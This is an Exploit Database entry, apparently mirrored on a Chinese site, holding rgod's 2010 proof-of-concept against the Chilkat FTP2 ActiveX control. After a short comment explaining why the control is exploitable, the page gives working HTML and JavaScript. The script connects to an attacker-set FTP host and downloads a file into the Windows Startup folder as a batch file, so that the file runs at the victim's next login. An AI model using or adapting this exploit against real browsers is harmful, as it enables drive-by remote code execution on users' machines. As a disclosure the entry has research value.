Chilkat Software FTP2 – ActiveX Component Remote Code Execution

• Exploit Database
• 14 阅读

• 作者： rgod
  日期： 2010-12-30
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15866/

• <!--
  Chilkat Software FTP2 ActiveX Component (ChilkatFtp2.DLL 2.6.1.1) Remote Code Execution poc
  by rgod
  tested against Internet Explorer 7 on Vista
  should also work with 8/9
  ActiveX Settings:
  CLSID: {302124C4-30A0-484A-9C7A-B51D5BA5306B}
  Progid: ChilkatFtp2.ChilkatFtp2.1
  Binary Path: C:\Windows\System32\CHILKA~2.DLL
  KillBitted: False
  Implements IObjectSafety: True
  Safe For Initialization (IObjectSafety): True
  Safe For Scripting (IObjectSafety): True
  
  This class allows to copy/overwrite files inside arbitrary locations ex. by the GetFile()
  method. This code creates a batch file inside the automatic startup folder,
  setup a ftp server allowing anonymous connections and place the code you want
  to be retrieved.
  This control is also used by lots of freeware applications, it was not documented so I posted here.
  Note that previous versions has a different clsid, I'm saying this for filtering purposes.
  -->
  <html>
  <object classid='clsid:302124C4-30A0-484A-9C7A-B51D5BA5306B' id='obj' />
  </object>
  <script>
  obj.UnlockComponent("suntzu"); //needed for file transfer operations, type whatever here
  obj.Port=21; //configure ftp connection
  obj.Hostname="192.168.0.1"; //change here
  obj.ConnectTimeout=5;
  obj.Passive=1;
  var x;
  x=obj.Connect(); 
  if (x==1){
  x = obj.GetFile("suntzu.txt","c:/Users/All Users/Microsoft/Windows/Start Menu/Programs/Startup/suntzu.bat"); //boom
  }
  obj.Disconnect();
  </script>
  
  original url: http://retrogod.altervista.org/9sg_chilkat.html